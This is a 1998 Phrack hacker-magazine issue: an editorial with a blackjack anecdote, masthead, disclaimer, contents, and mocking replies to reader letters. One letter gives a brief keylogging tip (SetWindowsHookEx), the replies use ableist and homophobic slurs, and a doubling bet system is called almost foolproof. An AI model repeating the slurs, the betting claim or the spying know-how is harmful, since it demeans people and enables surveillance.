---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 01 of 12

-------------------------[  P H R A C K     5 4   I N D E X

--------[  Living in SYN

Things that we want for Christmas:

    Functional remote operating system detection.
    Functional remote promiscuous mode detection.
    Functional agent based intrusion detection.

A note about this issue.

Loyal and perceptive readers will notice this issue is a bit smaller. There are two reasons for this. The first is swift delivery. We are attempting to make Phrack issues a bit more svelte in order to pump them out on a more timely basis. The other reason is quality. There is enough garbage out there. We turn down at least half of all submissions to bring you the good stuff. Enjoy.

Rewind to August 1998. It's Sunday morning in Las Vegas, about 5:00am-ish. Angstrom and I decide to leave the Hard Rock Hotel. It's been a long night of drinking and gambling. I am up maybe $200. He's up about $30. We're both inebriated beyond repair. We return to Jackie Gaughan's Plaza Hotel and Casino, a wretched place where the old go to get older and everyone's got at least one foot in the grave. Back to the Future II? Biff's Pleasure Palace? Welcome to the Plaza Hotel.

Anyhow, we saunter on in, make our way over to the lounge and find Artimage, Asriel, Glyph, and Alhambra.* After some random dialogue (the specifics of which I have completely forgotten) Asriel tells me I should play some more Blackjack.

"I only have hundreds." was my reply. I didn't want to play anymore anyhow. This was the 6th day of my Vegas stint and I was burnt on gambling.

"Bet a hundred then." says As.

"Ok." I caved.

I plop down at an unoccupied blackjack table and plunk my hundred down. The dealer was a gentle looking 200 year old man from Laos.

"MONEY PLAYZ!" I say. I remember being very drunk.

"Money plays?" He questions. The pit boss wakes up.

"Money plays." I confirm.

"Money plays!" He announces to the pit boss. The pit boss scribbles in his book.
Here's where the details get fuzzy. I can't remember the hand I was dealt, nor any subsequent cards. All I know is I played textbook blackjack. That's all you need to know here. I played according to the `book`. I lost that hundred.

At that point, my blackjack betting system kicked in. I lay down 2 more bills.

"Money playz." I repeat.

"Money plays!" He announces to the pit boss. The pit boss scribbles something else in his little book.

My system is simple and almost foolproof. Bet small when you are just fucking around. Bet big when you want to win big. Lose a big hand? Double your bet. Lose again? Double it again. Lose again? Goto 1. The odds in blackjack tend to hover around 0.5% in the house's favor (this can vary widely depending on several factors including the type of blackjack, the number of decks, the skill of the player, whether or not the player counts cards, the card counting scheme used, etc**). Eventually, odds are, you will win all your money back, AND THEN SOME!*** Of course, this relies on both your bankroll and the table maximum being unlimited. Small details I usually overlook.

So I lose the 2 hundred. THE SYSTEM IS STILL IN FULL EFFECT. I plunk down another 4 small.

"Money plays?" The dealer muses. I nod.

"Money plays." The pit boss scribbles.

I lose another hand. Bye-bye 4 hundred. Asriel is laughing at this point.

"Dude, I think you should quit now." He offers.

"Nah. I'm not done yet."

Hrm. Time to gather my thoughts. No more namby-pamby. Time to separate the armchair gamblers from the hard-core haggard idiot types who end up having to live in Vegas. I peel off 10 hundreds. 1 large is placed in that little betting circle thingy.

"Money plays." The pit boss scribbles, onlookers gawk, I pray.

Now this hand I remember distinctly. First card: an 8. Hrm. Second card: a 6. Ugh. Dealer shows an 8. FUCK. Oh. Good. Well, that's $1700 well spent in about 2 minutes. Well. I had to hit. I get a 6. Wow. WOW! Dealer flips his hole card. A 10.

"HAHAHAHHAHAHAHAHAHA" I proclaim.

"10 blacks out" The dealer shouts. The pit boss stops writing.

"Want to be rated?" He asks.

"Nope! Bye!" And off I went to cash out.

*   http://www.infonexus.com/~daemon9/PIX/Misc/defcon6/r00tdinner%2b/latenite3.jpg

**  Actually, playing basic strategy alone can sometimes give you pretty close to even odds (or even better than even). Usually, however, you will find that you will need to count cards in addition to basic strategy to have a real advantage.

*** Assoc. Editor's note: If you take this advice, chances are you'll be a very upset and angry gambler come next Defcon. Whine to route when you can't afford a hotel room, not me. Maybe he'll let you sleep on his floor.

A special shout-out to Ron Rivest. It has worked its way down the grapevine that he reads Phrack. Add one more to the Super Elite People That Read Phrack (SEPTREP) list. If you are or know one of these people, please send email to the editor to be added to the list (See linenoise for the list).

A word of caution about P54-06 and P54-10: If you attempt to apply the kernel patches for these articles in succession on the same system, the second one will fail at the syscalls.master file. You will need to patch this by hand. It's not hard. Go ahead and try it. I trust you.

Enjoy the magazine. It is by and for the hacking community. Period.
-- Editor in Chief ----------------[ route
-- Associate Editor ---------------[ alhambra
-- Phrack World News --------------[ disorder
-- Phrack Publicity ---------------[ dangergirl
-- Phrack Webpage Guy -------------[ X
-- Phrack Typographical fixer -----[ silitek
-- Phrack Special Consultant ------[ redragon
-- Mad Cow disease ----------------[ sir dystic and dildog
-------- Elite --------------------> daveg
-- Official Phrack/r00t auto ------[ BMW M3
-- Your trusted security advisors -[ p and sw_r
-- Shout Outs and Thank Yous ------[ kamee, vision, artimage, chris, meenk,
-----------------------------------| the former SNI team, n8, phundie, par,
-----------------------------------| radium, k0re, horizon, dhg, mds, mudge,
-----------------------------------| bioh, pm (for the elite dox)

Phrack Magazine V. 8, #54, Dec 25th, 1998. ISSN 1068-1035

Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing may be reproduced in whole or in part without written permission from the editor in chief. Phrack Magazine is made available quarterly to the public, free of charge. Go nuts people.
Contact Phrack Magazine
-----------------------

Submissions:        phrackedit@phrack.com
Commentary:         loopback@phrack.com
Editor in Chief:    route@phrack.com
Associate Editor:   alhambra@phrack.com
Publicist:          dangergrl@phrack.com
Phrack World News:  disorder@phrack.com

Submissions to the above email address may be encrypted with the following key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
=1iyt
-----END PGP PUBLIC KEY BLOCK-----

As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out plaintext. You certainly can subscribe in plaintext.

phrack:~# head -20 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of the
 *  editors and contributors, truthful and accurate.  When possible, all facts
 *  are checked, all code is compiled.  However, we are not omniscient (hell,
 *  we don't even get paid).  It is entirely possible something contained
 *  within this publication is incorrect in some way.  If this is the case,
 *  please drop us some email so that we can correct it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
 *  entirely stupid (or illegal) things people may do with the information
 *  contained herein.  Phrack is a compendium of knowledge, wisdom, wit, and
 *  sass.  We neither advocate, condone nor participate in any sort of illicit
 *  behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in the
 *  articles of Phrack Magazine are intellectual property of their authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */

-------------------------[  T A B L E   O F   C O N T E N T S

 1 Introduction                                        Phrack Staff     22K
 2 Phrack Loopback                                     Phrack Staff     58K
 3 Phrack Line Noise                                   various          90K
 4 Phrack Prophile on the parmaster                    Phrack Staff     26K
 5 Linux and Random Source Bleaching                   phunda mental   174K
 6 Hardening OpenBSD for Multiuser Environments        route            90K
 7 Scavenging Connections On Dynamic-IP Networks       Seth McGann      34K
 8 NT Web Technology Vulnerabilities                   rfp              40K
 9 Remote OS detection via TCP/IP Stack Fingerprinting Fyodor           58K
10 Defeating Sniffers and Intrusion Detection Systems  horizon         100K
11 Phrack World News                                   Disorder        240K
12 extract.c                                           Phrack Staff     32K
                                                                       ----
                                                                       966K

-----------------------------------------------------------------------------

"...a bellvue in the mental hospital world of media whore web pages..."

    - xanax on #phrack, 10-13-1998, when asked to comment on Antionline.

"This is not a tool we should take seriously, or our customers should take seriously..."

    - Edmund Muth, Microsoft, as reported by the New York Times, referring to Back Orifice. (How many thousands of machines were owned with BO?)

*deraadt* your style is so unlike anyone elses, that is makes no sense that you have this "style"

    - Theo Deraadt, OpenBSD project leader, referring to route's code in this issue.

"So I thought of something useful I could do with the money. I bought a Nintendo 64 for one of my sisters, who has a slight mental retardation. The reason for this was because the doctors have always told us that things to stimulate her hand eye coordination would help her."

    - Chameloen of the `masters of downloading` "hacking group", commenting on why he didn't spend money on medical care for his sister.
-----------------------------------------------------------------------------

----[  EOF

---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 02 of 12

-------------------------[  P H R A C K     54   L O O P B A C K

--------[  Phrack Staff

Phrack Loopback is your chance to write to the Phrack staff with your comments, questions, or whatever. The responses are generally written by the editor, except where noted. The actual letters are perhaps edited for format, but generally not for grammar and/or spelling. We try not to correct the vernacular, as it often adds a colorful perspective to the letter in question.

0x1>--------------------------------------------------------------------------

My boyfriend turned homself into a transexual and dumped me for another guy.What could you do to help me (please)show him how much I appreciate him? Or,what should I do?THIS letter is no prank.This truly happened and I was hoping for some advice from you so PLEASE don't blow up my computer.Sincerely,B.C.

    [ I swear to god this is an actual letter. I can't make this stuff up (no sarcastic commentary needed here). ]

0x2>--------------------------------------------------------------------------

An interesting zine you have, but I have to say my favourite part is the loopback section. The writing in the letters is passing at best, while the satirical commentary is absolutely first rate. I just read loopback from #53 and I just kept laughing. Way to go. Hey, as I say, don't take life seriously, it doesn't take you seriously.

    [ Thank you. We aim to please. ]

0x3>--------------------------------------------------------------------------

What is the system a school uses called? PBX? How can I hack the system and what type of priveleges can I gain?

LocoJ

    [ You can listen to the school officials talking about how much of a retard they think you are and how they are going to hold you back another year. ]

0x4>--------------------------------------------------------------------------

Have you ever wandered how people called hackers keep on annoying government agencies and major corporations?

    [ I often find myself wandering that very thing. ]

Most secure government information is not a secret to these people, no protection guarantees safety against their breaking in.

    [ No one can eat just one! ]

Some people may think that in order to be a hacker one must be extraordinary smart, use expensive equipment and have contacts with the underground world.

    [ That's about the size of it. And we all have sex with models. That's key. ]

This is not true. Recent studies show that a computer user is at least twenty percent smarter than an average person.

    [ Uh. Yah. That's a great statistic. Who doesn't use a computer these days? The only people not using computers are either mumbling retards or are hooked up to computers to live. ]

If you are reading this you are smart enough.

    [ However, if you are *writing* it, evidently, you're not. ]

All the equipment you need is your computer and modem. And try to avoid contacts with the underground world - they are trouble.

    [ Indeed. Stay away from the people who really know what they are doing. Be sure to blanket yourself with blissful ignorance. Live a sheltered life alone. Stay away from people. They will only hurt you with words. ]

All you really need is information.

    [ "..which you won't get here!" ]

For the first time information kept secret both by government and hackers is available to public. Our informational report contains everything you need to know about hacking including:

*"Hackers 101" - the ultimate and comprehensive step by step guide to how it's done. This incredible guide written by an accomplished hacker especially for beginners will answer following questions:

    [ Accomplished at bathing himself and being able to tie his left shoelace and most of the right one. ]

-What should you know about hacking and where to start?

    [ Start at your local brothel! ]

-Programs needed.
-List of access numbers.

    [ How about a list explaining what these numbers are supposed to access. ]

-How keep yourself safe.
-Cracking programs, what they do and how they work.
-UNIX, an easy approach.
-Password shadowing.
-Dialouts.
-Scanners.
-Brute force hacking.
..and much more.

    [ -programing for the ultimate idiot
      -hookers and pimps: a two day tutorial
      -circus animal social engineering
      -building chicken flavored air conditioners ]

*Hacker resources on the Internet: The most complete collection of real life hackers websites where you can find:
-programs
-tools
-scripts
-most recent know-how and techniques
-news from the world of hacking

    [ NEWSFLASH: YOU SUCK ]

-tones of other useful information.

You can receive our report as a printed material (only $9), on a floppy in *.txt format (only $7) or by email in *.txt format/ZIP file (only $7).

    [ And you can receive a thump on the head from the Phrack staff if you actually send these precious retards any money. ]

For domestic orders S&H is $1. For orders from Alaska, Hawaii and foreign countries please add $5 for S&H. For email orders S&H does not apply. Order now and as a free bonus you will receive a guide to Internet sites with thousands of totally free software titles (limited time only). Send cash, check or money order to: TWS, PO Box 1357 Rancho Cordova, CA 95741. For check orders please allow one week for clearance.

    [ ...so i can ask my mom to cash it for me... ]

Disclaimer: Please keep in mind that any information we provide is for educational purposes only.

    [ Educational? Try mildly recreational at best. ]

TWS is not responsible for any actions of its clients.

    [ ...because we have no clients... ]

0x5>--------------------------------------------------------------------------

Before I start, if this is the wrong address I should be grovelling to then I apologize profusely.
    [ It's probably not the wrong address, but I accept your apology for what will probably be an inane question. ]

I'm relatively new to the entire computer world. I mean I've had a computer for a number of years and the internet for about 15 months but I feel that I don't know enough.

    [ As if one can ever feel that she `knows enough`. ]

I'm BORED with what I can do and I was wondering if you could tell me or

    [ Bored with nothing I can understand. ]

perhaps face me in the direction I need to go to learn how to hack. The very basics. The amoeba level of hacking if you will.

    [ Ok. Start small. Start with hacking napkins and forks and spoons, then slowly move onto more complex devices like drawers and scissors. Someday you can move on to wall clocks and `the clapper`. You'll get there eventually. ]

Ever since I've been online I've always wanted to know how to hack. You see the articles on captured hackers and the news on firms trying to boost online security and it makes you want to go out there do stuff. So if you've got the

    [ "Do stuff"? Well. You've certainly got the right mentality. Hey, maybe sometime I can come over to your house and we can watch T.V. or listen to CDs or something. ]

time, it would really be appreciated.

Much appreciated,
-Dallor

0x6>--------------------------------------------------------------------------

do you have a chat room? i was told you could teach me some stuff about computers.i am very new to the computer world @ my old age.i mess my system at every 2weeks do to the fact i dont know what to do!

    [ I suggest you look into other hobbies. Maybe nursery rhyming? ]

- naynay

    [ Sha-naynay! ]

0x7>--------------------------------------------------------------------------

Hello, just wanted to congratulate you guys for an excellent magazine and keep up the hard work. Also I have noticed that ppl can ask for things. So could I please have a two storey mansion, Porsche, Harley Davidson, yacht, five million dollars, seven beautiful girls (one for each night), ..................
..............................................

thank you :-))

cheers
Rundus

    [ You are a shallow materialistic person Rundus. People all over the world are suffering from famine and disease. Maybe you should give some thought to them. ]

0x8>--------------------------------------------------------------------------

[ P53-02@0x12: ... I would like to know more about marshmellows... ]

Well, since Phrack has gifted me with so much knowledge, it's time for me to start giving back!

    [ NIGH time if you ask me... ]

Marshmellows date back to Ancient Egypt where the ancients took the roots from a mallow plant/tree and made it into a sticky paste. From there it was cooked to form a puffy yellowish treat for the Pharoahs and such. The mallow "treat" became popular in the 30's as a confectionary treat. However, due to the long process of making these treats, they did not reach the popularity of today until Marshmellow making was revolutionized in the 60's. The "jet-puffed" method was introduced. The sticky base material was mixed with sugars and other additives and puffed using a airation type machine. The marshmellow comes out of the machine in long tubes and is cut to form the shape of what we know as marshmellows today.

For the history of corn flakes, SPAM, or Jello, please contact your neighborhood loser.

    [ Hrm. I suppose you think marshmellows are in the upper echelon of confectioneries? WHAT GIVES YOU THE RIGHT? ]

My thirst for knowledge is not limited to computer systems. Sadly..

Ray K.

    [ Tune in next issue when Ray gives a dissertation on Peter Scolari's career in the television industry entitled: "From Bosom Buddy to Honey I'm Drunk Again and Out of Work"... ]

0x9>--------------------------------------------------------------------------

Hey! I was wondering if you could help me to find some things?

    [ Sorry bro. I don't know where your family is. I think they've ditched you. I say pick up and move on. ]

Well I'm in to games. And I know that x-files have got a game with the same name. Do you know where I can find it so that I can download the game on my computer???

    [ Hrm. Try Best Buy or maybe Babbages. ]

And do you know some good sites where you can find ONLY mp3s??? Thanks for your time

Cybers

    [ What an excellent and unique nickname! ]

0xa>--------------------------------------------------------------------------

Pretty clever.........I saw the web page on the tv........PHRACK......bein' where you come from wasn't hard to find this page.......

    [ Uh. Rite. ]

Just thought it was hilarious and totally in the right to show that not everyone is as safe as they would like to think..... A SUPPORTER of your beliefs I am......

    [ Cool. We need more zealots for our secret army. ]

Thanks fer showin hacks still live a breath beneath everyone else........

    [ Huh? ]

after all it's only wrong if you get caught......consequences dictate the course of ACTION...(REV. JAMES KEENAN MAYNARD,tool)

    [ Well, actually, getting caught is independent of equity. And letting consequences dictate the course of action seems rather backward and after-the-fact-ish. ]

Bit-Basher......

0xb>--------------------------------------------------------------------------

Just thought I would write in to voice my concern about a growing problem in our community: Lamers and Idiots. Alot of the time people ask me what makes up a lamer.

    [ Perhaps they are asking you because you fit the mold so nicely. ]

IN my opinion, if you are 2 or more of these, you are a lamer/idiot.

    [ In my opinion, you are an idiot if you make lists about what comprises idiocy. ]

1- unnecessarily ask for information that any damned idiot could find in 10 minutes on a search engine

    [ Somehow I doubt people of any level of intelligence come to you for answers. Idiots can smell each other out pretty well. ]

2- Talk in leet-speek ("haY d00dZ Eye'm uhn 3l33t hax0r, g1v3 m3 p455w0rd5!") and expect everyone to give you the slightest sliver of respect

    [ Please don't ever email me or Phrack Magazine again. I don't care how much of a good idea it seems, don't do it. The heat death of the universe had better happen before I hear from you again. ]

3- Shoot your mouth off about stuff you know NOTHING about

    [ Or in your case, ANYTHING. ]

4- Claim to run or own high sites (ArchAngel claiming to own the L0pht is an excellent example).

    [ Who the hell is that? ]

5- Ask for exact instructions on how to hack a site

    [ A little game I like to play when I'm bored is `find the moron`. Woop! There you are! ]

There's more criteria, I'm sure, but I just can't think of it.

    [ BUT HOW WILL THE IDIOTS AMONG US COPE!@? ]

Newbies constantly ask to be taught.As for the newbies out there - who are on the verge of becoming lamers - I think the best advice we can

    [ Oh. No. Nono. Don't do that. Please. `We`. Do not refer to us as peers. ]

give them is that hacking is not a "teachable" skill. It's something that has to be learned through experience - you have to know how things work, how things interact, and that invlves educating yourself. Never rely on someone else to give you acurate information - always look for the facts.

    [ Good plan. Never attempt to learn from anyone. Be your own mentor. School yourself in ignorance. ]

Well, I'm not really sure what that rant was about but thanks for listening to it..

    [ Well if you don't then I sure as hell have *no* fucking idea. ]

{BTW Phrack 53 was great. Keep it up.}

    [ Hey Thanks! Always nice to hear when we're doing a good job! ]

0xc>--------------------------------------------------------------------------

Hey, i'm new at this. how do i get started? see i want to find out some yahoo codes. is there anything i should know? i don't have a clue what is legal and what is not...

    [ Ok. That's simple. `Cyberspace` is kinda like the Old West.
      There's one guy who hangs out and deters criminals with his magic busket of moral redemption. Any wrong-doer who comes in contact with it instantly regrets his sin and is then forgiven. The busket is faulty though and sometimes (about 30% of the time) the person just explodes. However, scientists and alchemists from Brown University are working on a magic pill that will prevent this occasional exploding. It doesn't so much *prevent* the exploding though, as much as it pieces the person back together *after* the explosion. The rub is that you have to take the pill prior to explosion. And no one wants to take the pill because it's like a red flag to the authorities that you are a wrongdoer. Oh wait, maybe that was a dream I had. ]

form Bisker

    [ Shape-of... a spider monkey! Form-of... a bisker! ]

0xd>--------------------------------------------------------------------------

I need help I know you must be thinking that I am some lamer with AOL and Windows who will never in his life become a hacker.

    [ I kinda just had you pegged as someone who is scared of punctuation. ]

Well, most of that is true but I (Hopefully in time) will become a hacer.

    [ Godspeed. ]

I need to know how do I protect my computer from other hackers?

    [ Ok, I'll give you an insider tip. Here's what we do to keep our computers safe from electronic ruffians: we use them once, then throw them away. ]

Are there any .txt documents that you think I should read?

    [ Check out the one entitled `My Two Mommies`. It answered _a lot_ of questions for me. ]

I need all I can get on this topic so i can finally move on to the next step (I don't know what that is yet my friend is helping me become a hacker).

    [ Did he read "My Two Mommies"? If not, he's a charlatan. He's probably just telling what you want to hear so you'll sleep with him. I'd shank him once in the leg to be safe. ]

I don't care how many things I have to read just as long as I can become a hacker.

    [ Just think! If you're reading this, you're *that* much closer! ]

P.S. I had no clue who to send this to so I picked you (Doesn't that make you feel special?). Also please don't make this public I went to some websites and found Hackers love making fun of lamers and posting the mail they get on there sites so I have this feeling that your going to post this letter somewhere. Just don't please.

    [ Not a problem. I'll keep this to private email. ]

0xe>--------------------------------------------------------------------------

Just browsed yr web page... you are an interesting person.

    [ Agreed. ]

I 'd love to come to your r00t party (honest); may I?

    [ Absolutely not. ]

I leave in greece and I am planing to travel to the u.s. this xmas.

    [ That's nice. ]

It would be a grate opertunity for me to meet you and your friends.

    [ Yes, but it's just as good an opportunity for you not to meet us. ]

PS: I am not a hacker, I just admire your work.

    [ Well, thank you very much. That's good to hear. ]

liquid, Wed Sep 16 06:24:09 1998

0xf>--------------------------------------------------------------------------

hi todos

    [ Who? ]

i was just reading some files about hacking and phreaking by french writters than one or two suggestions came to my mind

(i) stop writing like a pre-pubescent boy with lot of ***eZ and B1abL4(blabla)

    [ YAH! YOU DAMN FRENCH COMMIE NAZI BASTARDS! ]

(ii)be more explicit and professional like in PHRACK

    [ YAY AMERICA! ]

so i hope that i have rung the bell to the wrong door, and that the french scene does not look like that.

    [ Huh? ]

another thing: does hack include studying and find flaws in religious system ?

    [ Shure, why not? ]

because in fact religious system are formal system based and we can always find paradox (godel's theorem) if yes i would have a futur paper for phrack

    [ Alright. ]

i have an os name for mythrandir 'TRYOS' it's very short and really summerises his work

THANK FOR ALL YOU DO FOR THE HACKER COMMUNITY PHRACK IS THE BEST THING I HAVE EVER READ

    [ WELL GOOD. IT'S THE BEST THING I HAVE EVER WRITTEN. ]

TFAYD.

0x10>-------------------------------------------------------------------------

man just to let you know, this is some very "educational" info. can't say that i learned a lot, but this info help me catch up the past five years. been in the navy, man it sucked, but i want to commend y'all. but it's like they say, smart enough to do it, then do it, but it's your consequences. to all the "real" people out here in this beloved world, too bad they don't know reality. anyways, this is dope, it is the bomb.

    [ Word `em up on the level. ]

--vadaka--

0x11>-------------------------------------------------------------------------

Hi. I am OmniLynx, and I'm thinking of starting a new Web-Zine for hackers.

    [ Hey! Sounds like a great niche market! ]

In the true spirit of hacking, it will be free to anyone who wants it.

    [ In the true spirit of martyrization and self-glorification. ]

Unfortunately, at this point it is still just a thought, because I do not have enough sources to make it any good. I'd like to know if you would want to become a source for my Web-Zine. All you have to do is scout out tips, tricks, news stories, anecdotes, etc. for or about hackers.

    [ Please, may I? Can I be your intern? I'll be your Jimmy Olsen! Let me set aside my professional career, my personal life, and my ezine with it's 14+ year history and get _right_ on that. ]

Unfortunately, you can't be paid for this, because it is free, but you will

    [ BAH! Who needs money? Your adulation is payment enough! ]

get your name published and, possibly, be able to express your thoughts in a column.

    [ SHUT UP! I would be able to write a column?!@ Wow! I need to break out my `Sony's My First Zine Kit` and get started! ]

OmniLynx

    [ Dude. That's ironic. I almost chose the nick `EverpresentBobcat`. ]

0x12>-------------------------------------------------------------------------

HI phrack, I am just reading phrack #52 `phrack loopback'.
You are just making me to laugh to dead. Better than any joke mailing-list [ HOLY SHIT! Dude, I don't want anyone to laugh to dead! If everyone laughs to dead, how will I get any repeat business? ] fred 0x13>------------------------------------------------------------------------- Been fucking around on the internet for about 3 years. After I got over the intial rush of "WOW, look at all this fuckin software!" [ And porn. ] (and concurrently dumping OS/2 and msdog for Linux), I started reading...and reading....and reading...then I ran into Phrack. In a word - KICKASS! [ Thankz Cartman. ] I've been reading all of the issues the last couple of daze and I'm really impressed with the overall feeling of it. It's great reading about past 'battles' with the telco and systems (Phiber Optik stuff comes mind), the DETAILED instructions given about various terminals, and the schematics and stuff. History, Software and Hardware. [ Don't forget all the great articles about bombs! Smoke bombs, bolt bombs, acetylene bombs, shell bombs... Ah yes, the mid-80's were a tumultuous time when youth felt the need to blow things up. ] Besides pussy and beer, I can think of no more interesting subjects. [ Except perhaps degrading and objectifing women. ] I applaud the way you've kept it going by passing it on. I applaud that you've remained true the idea "All information is public information - and the aquisition thereof". I applaud the fact that it has survived this long - for free. Next to the kernel - PHRACK[0-5][1-9] just might be the most important bits on my machine. Keep it up fuckers - cause sure as taxation without representation, they are gonna try and stomp you (us). [ (you). ] p.s. pointers on to how to hack sendmail to totally rewrite the headers and envelopes to reflect a completely bogus username/system (for purposes of anonymity - such as email like this) would be greatly appreciated. If the pointer is 'grep sendmail ./PHRACK*' then... ......nevermind... 
You fuckers rock..... Deicide [ I've decided you suck. ] 0x14>------------------------------------------------------------------------- I can prog............If you tell me how to hack I'll send my best progs....... [ Oh, that sounds like a fair trade. ] I am leada of Warco [ I am Lothar of the Hill People. ] 0x15>------------------------------------------------------------------------- Can you get me in touch with anyone in Chicago who can help me retreive deleted documents from my home computer. Thank You [ I think Emil is free. Give him a ring. ] 0x16>------------------------------------------------------------------------- I WAS WONDERING IF YOU KNEW WHERE I COULD FIND OUT HOW TO CONNECT TO AND HAACK PEOPLE'S PERSONAL COMPUTERS, OR MAY'BE YOU KNOW. I'D APRECIATE SOME ADVICE, [ Don't breed. ] X-3 0x17>------------------------------------------------------------------------- I need An Infectiouse Virus to corupt a small network If you have any idea where i could get one send me aline [ I need love and understanding. I'll trade you. ] 0x18>------------------------------------------------------------------------- Hey...I'm not into hacking or anything, but I read an article about you and Phrack in the Worcester Telegram and Gazzette this morning. I just wanted to tell you that I feel your not bending to goverment pressure and everything is very kool. This isn't about anarchy, it's about rights; freedom of the press. Ya know? Anyhow, I will not take up anymore of your time. Remember, hackers have rights too. [ Some of us have mean leftz too. ] 0x19>------------------------------------------------------------------------- It would be nice to be able to contact someone to do some hacking for you in a specific manner. [ Sorry. We only hack in a vague, nebulous manner. ] Do you have any listings for this type of individuals? [ Try http://www.fbi.gov/fugitive/fpphome.htm. We usually recruit from there. 
      ]

0x1a>-------------------------------------------------------------------------

Hi there! First off, just let me say how incredibly awesome and all powerful
Phrack is, especially issue 52.

    [ A SUPREMELY POWERFUL JUGGERNAUT OF EFFICACIOUS POWER! ]

You have an amazing 'zine here, and I bow before you and worship the ground
you walk on. In fact, I think world domination is now in your grasp.

    [ Shure, if all the world was as obsequious as you, we'd be set. ]

< Yes, I'm hitting on you :P >

    [ Cool. Are you a hot chick? If not, back off fagbasket. ]

Really though, I'm just writing to thank you for Phrack Loopback.

    [ A self-fulfilling prophecy. Here we are. ]

While everything in Phrack is good, and the majority is great (as rated on
the sliding scale of total goodness), the thing that gives me the most
spiritual fulfillment every issue is Loopback.

    [ How can everything be good, yet the majority be great? ]

It provides 78% of daily allotted humor and 37% of the required sarcasm for
mental well being.

    [ And now you're a part of the love. *hug* ]

So, once more, thank you for the brilliant staff you have at Phrack, and
thanks as well to the people who write in!

    [ KEEP THOSE LETTERS AND CARDS COMING! ]

Unit3

0x1b>-------------------------------------------------------------------------

Hello, I know I am going to sound very lame when I ask this. I would really
like it if you could give me a quick brief description on how to hack into
systems remotely. I can hack but I can break into systems without having a
login and pw, well thnx ne ways

    [ You suck. ]

0x1c>-------------------------------------------------------------------------

I don't really know who to contact about this. It's a compliment to all of
phrack magazine about the owning thing. I am glad to see u guys take it well.
I don't know if I would be able to take it as well. But it is definitely
respectful. I and many other people already respected phrack magazine a lot..
but now I definitely have a lot more respect for phrack.

    [ Dude, you get any more respect for us and you'll officially qualify for
      the `Phrack Magazine Hoover Super Suck-up Award`. It's a prestigious
      award only given out to a select few. You're definitely in the
      running. ]

SPy109

0x1d>-------------------------------------------------------------------------

sir when i download an item from your page its in X's O'o and boxes.

    [ Oh. You must have reached our tic-tac-toe server by mistake. Try the
      URL again. ]

i tried ms/word note pad/ and no luck. can you help, im also looking for an
article on how to go through the back door of AOL

    [ I think there's one in the Virginia office, on the second floor. It's
      Penski's office, and he never locks his door, that fucking moron. ]

from my office to my home over the Internet.

    [ Oh. In that case, did you try wishing really, really hard? That
      usually works for me. ]

so i could check on my spouse who i think is doing me wrong.

    [ Oh, I can assure you, your spouse is up to no good. I think you should
      definitely get a divorce and take the kids. ]

thanks

0x1e>-------------------------------------------------------------------------

[ P53-07: A Stealthy Windows Keylogger ]

Dearest Phrack,

I read "A Stealthy Windows Keylogger" in Phrack 53.7. Huh? Just call
SetWindowsHookEx(). It's built right into the operating system. It lets you
grab key strokes. It's simple. It even works on Windows NT. There is no reason
to go hooking interrupts or writing chunks of inline assembly. The
documentation explains how SetWindowsHookEx() works. If that's still not
enough to go on, the Microsoft SDK ships with example programs that grab key
strokes.

- Iskra

0x1f>-------------------------------------------------------------------------

I see and hear all this about hackers; however, I never see and/or hear about
how it is done.

    [ Like ninjas, true hackers are shrouded in secrecy and mystery. You may
      never know -- UNTIL IT'S TOO LATE.
      ]

The reason I am asking is because of a soon-to-be-ex-wife who stole me cash I
operate my business with.

    [ Are you Irish? ]

I know she has placed the money in a bank somewhere in my home town. Is there
a way to find out which bank if I know her SSN?

    [ I bet she's one of those fiery Irish lasses with flowing locks of red
      hair and glittering green eyes. You think she'd go for me? How much
      money did she gank from you... Enough for her to run away and lavish me
      with gifts? ]

------------------------------------------------------------------------------
----[  EOF

---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 03 of 12

-------------------------[  P H R A C K     5 4     L I N E N O I S E

--------[  Various

0x1>-------------------------------------------------------------------------

The r00t/h4g1s peace summit - 1998
----------------------------------

In a digital world marred by strife and conflict, it was only fitting that the
two mega-super powers of the digital underground met for a peace conference
somewhere they could partake of the peace pipe. Amidst the quaint silence of
the fluttering windmills of Holland, the representatives of their respective
parties settled in for a week of negotiations in the heart of Amsterdam.

Day 1:

They paint fake flies (the flying kind, not the zipper kind) on the toilets in
the Schlipteinheinekinoffien airport in Amsterdam, because, as we all know,
hackers can't resist a good target. The next stop was to our official
reception at the Hotel Ibis. I walked into the room, meeting face to face with
7 of the most notorious and feared hackers alive. My heart raced, and I felt
all the sweat glands on my body release in one giant orgasmic instant. And
then I started coughing...

Day 2:

My throat severely scarred from the previous day of going to "coffee" shops
and buying (legally) some marijuana with such names as "The Elite Buddha", and
"Zero Day", we set out for some serious negotiations on the second day.
Our mission was to create a truce, allowing the free transportation of our
packets, unencumbered, unmodified, and unmonitored, across the Internet. H4g1s
demanded r00t supply them with "-1 Day" in exchange for peace. r00t requested
a "-1 day" from an Internet savvy street person who kept reminding us of our
r00t brother, X. The street person, we'll call him Outlaw, showed us some
pills, but they did not appear to be what h4g1s was looking for. So, we
decided to move on. Outlaw, however, had other ideas. He wanted his 25
guilders to take his aspirin to X, apparently (For those of you unfamiliar, a
